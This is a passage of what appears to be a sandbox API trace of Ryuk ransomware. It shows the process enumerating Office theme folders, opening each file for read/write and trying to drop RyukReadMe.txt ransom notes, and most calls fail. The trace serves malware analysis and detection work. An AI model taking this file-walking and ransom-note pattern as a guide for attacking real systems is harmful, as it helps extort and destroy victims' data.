CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.231] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.231] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.231] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.231] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM", dwFileAttributes=0x80) returned 0 [0133.232] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.232] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.232] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.232] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.232] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF", dwFileAttributes=0x80) returned 0 [0133.233] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.233] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.233] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.233] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.233] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.233] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.233] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.233] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.234] SetLastError (dwErrCode=0x0) [0133.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.234] GetLastError () returned 0x5 [0133.234] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.234] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.234] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.234] SetLastError (dwErrCode=0x0) [0133.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.234] GetLastError () returned 0x5 [0133.234] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.234] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.234] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.234] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.234] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.234] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.235] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.235] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.235] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.235] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM", dwFileAttributes=0x80) returned 0 [0133.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.236] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.236] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.236] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.236] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.236] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF", dwFileAttributes=0x80) returned 0 [0133.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.236] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.236] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.236] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.236] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.237] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.237] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.237] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.237] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.238] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.238] SetLastError (dwErrCode=0x0) [0133.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.238] GetLastError () returned 0x5 [0133.238] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.238] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.238] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.238] SetLastError (dwErrCode=0x0) [0133.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.238] GetLastError () returned 0x5 [0133.238] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.238] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.238] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.238] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.238] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.238] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.239] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.239] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.239] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.239] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.239] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM", dwFileAttributes=0x80) returned 0 [0133.239] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.239] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.239] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.240] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.240] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF", dwFileAttributes=0x80) returned 0 [0133.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.240] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.240] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.241] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.241] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.241] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.241] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.241] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.241] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.241] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.241] SetLastError (dwErrCode=0x0) [0133.241] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.241] GetLastError () returned 0x5 [0133.241] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.241] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.241] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.242] SetLastError (dwErrCode=0x0) [0133.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.242] GetLastError () returned 0x5 [0133.242] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.242] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.242] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.242] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.242] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.242] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.243] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.243] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.243] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.243] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM", dwFileAttributes=0x80) returned 0 [0133.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.244] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.244] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.244] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.244] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF", dwFileAttributes=0x80) returned 0 [0133.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.244] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.244] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.245] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.245] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.245] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.245] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.245] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.245] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.245] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.245] SetLastError (dwErrCode=0x0) [0133.245] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.245] GetLastError () returned 0x5 [0133.245] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.245] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.245] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.246] SetLastError (dwErrCode=0x0) [0133.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.246] GetLastError () returned 0x5 [0133.246] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.246] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.246] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.246] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.246] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.246] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.247] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.247] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.247] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.247] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM", dwFileAttributes=0x80) returned 0 [0133.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.248] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.248] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.248] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.248] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF", dwFileAttributes=0x80) returned 0 [0133.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.248] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.248] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.249] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.249] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 